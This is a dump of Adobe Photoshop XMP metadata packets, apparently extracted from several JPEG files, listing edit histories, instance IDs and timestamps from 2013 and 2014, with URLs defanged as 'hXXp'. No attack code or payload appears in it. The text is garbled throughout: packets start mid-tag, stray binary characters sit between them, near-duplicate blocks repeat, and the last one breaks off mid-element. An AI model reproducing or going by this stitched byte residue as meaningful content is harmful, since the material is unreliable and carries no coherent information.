stEvt:action="saved" stEvt:instanceID="xmp.iid:691C5B166778E3118575E6F7532274FE" stEvt:when="2014-01-08T21:57:22 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:9D15E5A26D78E3118575E6F7532274FE" stEvt:when="2014-01-08T22:15:51 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:A615E5A26D78E3118575E6F7532274FE" stEvt:when="2014-01-08T22:31:13 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:119794074281E311B87BF5348FEEC9C0" stEvt:when="2014-01-20T03:43:54 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:129794074281E311B87BF5348FEEC9C0" stEvt:when="2014-01-20T03:43:54 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:119794074281E311B87BF5348FEEC9C0" stRef:documentID="xmp.did:DD92D9186678E3119905BAC7617B8686" stRef:originalDocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686"/> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>xmp.did:DD92D9186678E3119905BAC7617B8686</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>2014:01:08 22:20:39" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2014-01-08T21:15:42 08:00" xmp:MetadataDate="2014-01-08T22:20:39 08:00" xmp:ModifyDate="2014-01-08T22:20:39 08:00" dc:format="image/jpeg" xmpMM:InstanceID="xmp.iid:A315E5A26D78E3118575E6F7532274FE" xmpMM:DocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686" xmpMM:OriginalDocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:DD92D9186678E3119905BAC7617B8686" stEvt:when="2014-01-08T21:15:42 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:691C5B166778E3118575E6F7532274FE" stEvt:when="2014-01-08T21:57:22 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:9D15E5A26D78E3118575E6F7532274FE" stEvt:when="2014-01-08T22:15:51 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:A215E5A26D78E3118575E6F7532274FE" stEvt:when="2014-01-08T22:20:39 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:A315E5A26D78E3118575E6F7532274FE" stEvt:when="2014-01-08T22:20:39 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A215E5A26D78E3118575E6F7532274FE" stRef:documentID="xmp.did:DD92D9186678E3119905BAC7617B8686" stRef:originalDocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686"/> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>xmp.did:DD92D9186678E3119905BAC7617B8686</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>2014:01:20 03:44:30" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2014-01-08T21:15:42 08:00" xmp:MetadataDate="2014-01-20T03:44:30 08:00" xmp:ModifyDate="2014-01-20T03:44:30 08:00" dc:format="image/jpeg" xmpMM:InstanceID="xmp.iid:149794074281E311B87BF5348FEEC9C0" xmpMM:DocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686" xmpMM:OriginalDocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:DD92D9186678E3119905BAC7617B8686" stEvt:when="2014-01-08T21:15:42 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:691C5B166778E3118575E6F7532274FE" stEvt:when="2014-01-08T21:57:22 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:9D15E5A26D78E3118575E6F7532274FE" stEvt:when="2014-01-08T22:15:51 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:A615E5A26D78E3118575E6F7532274FE" stEvt:when="2014-01-08T22:31:13 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:139794074281E311B87BF5348FEEC9C0" stEvt:when="2014-01-20T03:44:30 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:149794074281E311B87BF5348FEEC9C0" stEvt:when="2014-01-20T03:44:30 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:139794074281E311B87BF5348FEEC9C0" stRef:documentID="xmp.did:DD92D9186678E3119905BAC7617B8686" stRef:originalDocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686"/> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>xmp.did:DD92D9186678E3119905BAC7617B8686</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>2LTF..ey2014:01:08 22:20:05" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2014-01-08T21:15:42 08:00" xmp:MetadataDate="2014-01-08T22:20:05 08:00" xmp:ModifyDate="2014-01-08T22:20:05 08:00" dc:format="image/jpeg" xmpMM:InstanceID="xmp.iid:A115E5A26D78E3118575E6F7532274FE" xmpMM:DocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686" xmpMM:OriginalDocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:DD92D9186678E3119905BAC7617B8686" stEvt:when="2014-01-08T21:15:42 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:691C5B166778E3118575E6F7532274FE" stEvt:when="2014-01-08T21:57:22 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:9D15E5A26D78E3118575E6F7532274FE" stEvt:when="2014-01-08T22:15:51 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:A015E5A26D78E3118575E6F7532274FE" stEvt:when="2014-01-08T22:20:05 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:A115E5A26D78E3118575E6F7532274FE" stEvt:when="2014-01-08T22:20:05 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A015E5A26D78E3118575E6F7532274FE" stRef:documentID="xmp.did:DD92D9186678E3119905BAC7617B8686" stRef:originalDocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686"/> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>xmp.did:DD92D9186678E3119905BAC7617B8686</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>TU.qv?2014:01:20 03:44:55" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2014-01-08T21:15:42 08:00" xmp:MetadataDate="2014-01-20T03:44:55 08:00" xmp:ModifyDate="2014-01-20T03:44:55 08:00" dc:format="image/jpeg" xmpMM:InstanceID="xmp.iid:169794074281E311B87BF5348FEEC9C0" xmpMM:DocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686" xmpMM:OriginalDocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:DD92D9186678E3119905BAC7617B8686" stEvt:when="2014-01-08T21:15:42 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:691C5B166778E3118575E6F7532274FE" stEvt:when="2014-01-08T21:57:22 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:9D15E5A26D78E3118575E6F7532274FE" stEvt:when="2014-01-08T22:15:51 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:A615E5A26D78E3118575E6F7532274FE" stEvt:when="2014-01-08T22:31:13 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:159794074281E311B87BF5348FEEC9C0" stEvt:when="2014-01-20T03:44:55 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:169794074281E311B87BF5348FEEC9C0" stEvt:when="2014-01-20T03:44:55 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:159794074281E311B87BF5348FEEC9C0" stRef:documentID="xmp.did:DD92D9186678E3119905BAC7617B8686" stRef:originalDocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686"/> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>xmp.did:DD92D9186678E3119905BAC7617B8686</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>2014:01:08 21:21:51~hXXp://ns.adobe.com/xap/1.0/" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2014-01-08T21:15:42 08:00" xmp:MetadataDate="2014-01-08T21:21:51 08:00" xmp:ModifyDate="2014-01-08T21:21:51 08:00" dc:format="image/jpeg" xmpMM:InstanceID="xmp.iid:661C5B166778E3118575E6F7532274FE" xmpMM:DocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686" xmpMM:OriginalDocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:DD92D9186678E3119905BAC7617B8686" stEvt:when="2014-01-08T21:15:42 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:651C5B166778E3118575E6F7532274FE" stEvt:when="2014-01-08T21:21:51 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:661C5B166778E3118575E6F7532274FE" stEvt:when="2014-01-08T21:21:51 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:651C5B166778E3118575E6F7532274FE" stRef:documentID="xmp.did:DD92D9186678E3119905BAC7617B8686" stRef:originalDocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>2014:01:20 03:45:22" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2014-01-08T21:15:42 08:00" xmp:MetadataDate="2014-01-20T03:45:22 08:00" xmp:ModifyDate="2014-01-20T03:45:22 08:00" dc:format="image/jpeg" xmpMM:InstanceID="xmp.iid:189794074281E311B87BF5348FEEC9C0" xmpMM:DocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686" xmpMM:OriginalDocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:DD92D9186678E3119905BAC7617B8686" stEvt:when="2014-01-08T21:15:42 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:691C5B166778E3118575E6F7532274FE" stEvt:when="2014-01-08T21:57:22 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:9D15E5A26D78E3118575E6F7532274FE" stEvt:when="2014-01-08T22:15:51 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:A615E5A26D78E3118575E6F7532274FE" stEvt:when="2014-01-08T22:31:13 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:179794074281E311B87BF5348FEEC9C0" stEvt:when="2014-01-20T03:45:22 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:189794074281E311B87BF5348FEEC9C0" stEvt:when="2014-01-20T03:45:22 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:179794074281E311B87BF5348FEEC9C0" stRef:documentID="xmp.did:DD92D9186678E3119905BAC7617B8686" stRef:originalDocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686"/> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>xmp.did:DD92D9186678E3119905BAC7617B8686</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>.comment {color:green}2014:01:08 04:35:33" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreateDate="2013-12-31T18:58:24 08:00" xmp:ModifyDate="2014-01-08T04:35:33 08:00" xmp:MetadataDate="2014-01-08T04:35:33 08:00" xmp:CreatorTool="Adobe Photoshop CS5 Windows" dc:format="image/jpeg" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:8443F241DA77E31189AEECDC69A6A4DB" xmpMM:DocumentID="xmp.did:8BAF9376D677E3119EEEC8EA648F8EDC" xmpMM:OriginalDocumentID="xmp.did:8BAF9376D677E3119EEEC8EA648F8EDC"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:8BAF9376D677E3119EEEC8EA648F8EDC" stEvt:when="2013-12-31T18:58:24 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="converted" stEvt:parameters="from image/jpeg to application/vnd.adobe.photoshop"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:8CAF9376D677E3119EEEC8EA648F8EDC" stEvt:when="2014-01-08T04:10:41 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:8343F241DA77E31189AEECDC69A6A4DB" stEvt:when="2014-01-08T04:35:33 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:8443F241DA77E31189AEECDC69A6A4DB" stEvt:when="2014-01-08T04:35:33 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8343F241DA77E31189AEECDC69A6A4DB" stRef:documentID="xmp.did:8BAF9376D677E3119EEEC8EA648F8EDC" stRef:originalDocumentID="xmp.did:8BAF9376D677E3119EEEC8EA648F8EDC"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>eo|%F2014:01:08 04:08:14yhXXp://ns.adobe.com/xap/1.0/" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreateDate="2013-12-31T18:58:24 08:00" xmp:ModifyDate="2014-01-08T04:08:14 08:00" xmp:MetadataDate="2014-01-08T04:08:14 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:8AAF9376D677E3119EEEC8EA648F8EDC" xmpMM:DocumentID="xmp.did:89AF9376D677E3119EEEC8EA648F8EDC" xmpMM:OriginalDocumentID="xmp.did:89AF9376D677E3119EEEC8EA648F8EDC"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:89AF9376D677E3119EEEC8EA648F8EDC" stEvt:when="2013-12-31T18:58:24 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:8AAF9376D677E3119EEEC8EA648F8EDC" stEvt:when="2014-01-08T04:08:14 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>2014:01:08 04:13:12" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreateDate="2013-12-31T18:58:24 08:00" xmp:ModifyDate="2014-01-08T04:13:12 08:00" xmp:MetadataDate="2014-01-08T04:13:12 08:00" xmp:CreatorTool="Adobe Photoshop CS5 Windows" dc:format="image/jpeg" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:AA906F22D877E3119391E0B0C4556EFB" xmpMM:DocumentID="xmp.did:8BAF9376D677E3119EEEC8EA648F8EDC" xmpMM:OriginalDocumentID="xmp.did:8BAF9376D677E3119EEEC8EA648F8EDC"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:8BAF9376D677E3119EEEC8EA648F8EDC" stEvt:when="2013-12-31T18:58:24 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="converted" stEvt:parameters="from image/jpeg to application/vnd.adobe.photoshop"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:8CAF9376D677E3119EEEC8EA648F8EDC" stEvt:when="2014-01-08T04:10:41 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:A9906F22D877E3119391E0B0C4556EFB" stEvt:when="2014-01-08T04:13:12 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:AA906F22D877E3119391E0B0C4556EFB" stEvt:when="2014-01-08T04:13:12 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A9906F22D877E3119391E0B0C4556EFB" stRef:documentID="xmp.did:8BAF9376D677E3119EEEC8EA648F8EDC" stRef:originalDocumentID="xmp.did:8BAF9376D677E3119EEEC8EA648F8EDC"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>2014:01:08 04:01:14" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" 